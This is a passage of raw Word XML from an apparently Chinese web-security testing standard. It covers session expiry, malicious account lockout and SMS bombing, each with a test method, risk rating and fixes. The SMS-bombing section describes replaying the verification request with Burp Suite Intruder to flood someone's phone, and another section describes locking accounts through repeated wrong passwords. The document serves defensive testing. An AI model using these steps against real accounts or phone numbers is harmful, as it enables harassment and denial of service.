          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Expire</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为长久有效，</w:t>
      </w:r>
      <w:r w:rsidR="005414EE" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户不退出系统的前提下</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击者可</w:t>
      </w:r>
      <w:r w:rsidR="005414EE" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长时间</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用用户的</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508097D3" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D4E8B" w14:textId="4C2A1043" w:rsidR="00E4042A" w:rsidRPr="00A845D4" w:rsidRDefault="004D75EB" w:rsidP="00A845D4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：公网系统会话失效时间超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB22FB" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60607648" w14:textId="77777777" w:rsidR="007F2DCD" w:rsidRPr="00A845D4" w:rsidRDefault="007F2DCD" w:rsidP="00A845D4">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的存活时间，超过存活时间强制销毁</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA69519" w14:textId="77777777" w:rsidR="007F2DCD" w:rsidRPr="00A845D4" w:rsidRDefault="007F2DCD" w:rsidP="00A845D4">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当客户端发生变化时（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等信息），要求用户重新登录；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C578F" w14:textId="3D748780" w:rsidR="00E4042A" w:rsidRDefault="007F2DCD" w:rsidP="00A845D4">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制每个用户只允许拥有一个有效</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，当用户再次登录时，攻击者所保持的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>便会失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2345C" w14:textId="73373E52" w:rsidR="008F1DA6" w:rsidRPr="00A845D4" w:rsidRDefault="008F1DA6" w:rsidP="008F1DA6">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F2DEE35" w14:textId="066FD9ED" w:rsidR="00B3517F" w:rsidRPr="00D12CC0" w:rsidRDefault="00B3517F" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc498434536"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护功能滥用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="301854A7" w14:textId="520C6ADB" w:rsidR="00B3517F" w:rsidRPr="00F757E4" w:rsidRDefault="00B3517F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc498434537"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意锁定问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A0562D" w14:textId="0E6D9E4B" w:rsidR="00B3517F"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="003549E7" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过不断的输入错误的密码可恶意锁定任意账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DAEAC" w14:textId="51A5B15F" w:rsidR="00B3517F"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="004F390A" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="00CF269C" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidR="004F390A" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户，不断输入错误的密码，直至将其锁定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB35CA" w14:textId="536445AC" w:rsidR="00B3517F" w:rsidRPr="00887C44" w:rsidRDefault="00C24790" w:rsidP="00887C44">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B3517F" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DC08C3" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若系统认证功能无防自动化处理模块</w:t>
      </w:r>
      <w:r w:rsidR="00C06AB6" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008A2F75" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可编写脚本批量锁定</w:t>
      </w:r>
      <w:r w:rsidR="00C90263" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B8982" w14:textId="77777777" w:rsidR="00B3517F"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE71546" w14:textId="5C93AF35" w:rsidR="00B3517F" w:rsidRPr="00887C44" w:rsidRDefault="00CF235F" w:rsidP="00887C44">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：锁定账户之后，可继续使用认证功能，导致可批量自动化账户锁定</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F9262" w14:textId="28B573AD" w:rsidR="00CF235F" w:rsidRPr="00887C44" w:rsidRDefault="00CF235F" w:rsidP="00887C44">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：锁定账户之后，可继续使用认证功能，但认证存在防自动化功能</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E6271E" w14:textId="77777777" w:rsidR="004952F2"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27D81F" w14:textId="1D9AD348" w:rsidR="00B3517F" w:rsidRPr="00887C44" w:rsidRDefault="00333DB8" w:rsidP="00887C44">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户锁定之后</w:t>
      </w:r>
      <w:r w:rsidR="004952F2" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应不能继续使用认证功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2F01C3" w14:textId="7120CBE6" w:rsidR="004952F2" w:rsidRDefault="004952F2" w:rsidP="00887C44">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证功能防自动化操作</w:t>
      </w:r>
      <w:r w:rsidR="0022121E" w:rsidRPr="00887C44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如添加图形验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295EC49B" w14:textId="06D686A3" w:rsidR="008F1DA6" w:rsidRPr="00887C44" w:rsidRDefault="008F1DA6" w:rsidP="008F1DA6">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399B1838" w14:textId="06C09D0B" w:rsidR="00B3517F" w:rsidRPr="00887C44" w:rsidRDefault="00B3517F" w:rsidP="00887C44">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFCF8F5" w14:textId="0EBFA03A" w:rsidR="00B3517F" w:rsidRPr="00F757E4" w:rsidRDefault="00B3517F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc498434538"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信炸弹</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="1B70D8BC" w14:textId="6DF2EED3"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="009E7CA1" w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信轰炸攻击时常见的一种攻击，攻击者通过网站页面中所提供的发送短信验证码的功能处，通过对其发送数据包的获取后，进行重放，如果服务器短信平台未做校验的情况时，系统会一直去发送短信，这样就造成了短信轰炸的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53375A05" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7EA965" w14:textId="77777777" w:rsidR="002A6808" w:rsidRPr="00237589" w:rsidRDefault="002A6808" w:rsidP="00237589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手工找到有关网站注册页面，认证页面，是否具有短信发送页面，如果有，则进行下一步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8554BA" w14:textId="2817FF1F" w:rsidR="00B3517F" w:rsidRPr="00237589" w:rsidRDefault="002A6808" w:rsidP="00237589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者其它抓包截断工具，抓取发送验证码的数据包，并且进行重放攻击，查看手机是否在短时间内连续收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条以上短信，如果收到大量短信，则说明存在该漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8088D" w14:textId="3595023A" w:rsidR="00B3517F" w:rsidRPr="00237589" w:rsidRDefault="00C24790" w:rsidP="00237589">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B3517F" w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A74908" w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过填写他人的手机号，使用软件</w:t>
      </w:r>
      <w:r w:rsidR="00A74908" w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00A74908" w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00A74908" w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intruder</w:t>
      </w:r>
      <w:r w:rsidR="00A74908" w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能重复提交发送短信的请求包，达到短时间内向他人的手机上发送大量垃圾短信的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076CDE6B" w14:textId="77777777"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lastRenderedPageBreak/>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D7680" w14:textId="6D3208B6" w:rsidR="00B3517F" w:rsidRPr="00237589" w:rsidRDefault="00A2726F" w:rsidP="00237589">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237589">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
